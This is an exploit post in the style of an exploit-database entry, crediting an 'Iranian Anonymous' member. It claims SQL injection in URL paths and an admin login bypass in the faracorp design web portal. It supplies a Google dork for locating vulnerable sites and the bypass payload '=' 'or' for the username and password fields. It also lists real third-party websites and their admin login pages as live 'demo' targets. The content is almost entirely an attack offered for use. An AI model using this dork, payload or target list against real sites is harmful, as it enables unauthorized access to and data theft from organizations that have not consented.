faracorp design Sql injection Vulnerability

##########################
# Exploit Title:  faracorp design Sql injection Vulnerability
# Google Dork : intext:"طراحی وب سایت و اجرا: پورتال هوشمند"
# Date:2016-11-19
# Discovered By: Ormazd
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Version: all
# Tested on : Win 10
##########################
## DP ##
hey . we have a  security problem in the faracorp design
This is a multiple problem of security
1- sql in page course_view.php
2- Admin page bypass
####

Poc1 :

http://www.Site.com/path/product/[inject here]/.html
or
http://www.Site.com/path/news/view/[inject here]/.html
or
http://www.Site.com/path/news/[inject here]/.html

...

Demo:
http://www.dsteel.ir/products/4/.html
http://www.doudmanco.com/portal/news/view/5/.html
http://www.vese.ir/news/63/.html	
####

Poc2:

http://site.com/admin

# Username : '=' 'or'

# Password : '=' 'or'

Demo:
http://www.dsteel.ir/admin/login.php
http://www.vese.ir/admin/login.php
http://www.alborzmachineco.com/admin/login.php
#############################

#Thanks to : MR.Khatar ||Turk-Khan || Blackwolf_Iran ||ll_azab-siyah_ll ||Sh@d0w ||Hellish_PN ||

And All Of Iranian Anonymous .

# Discovered By: Ormazd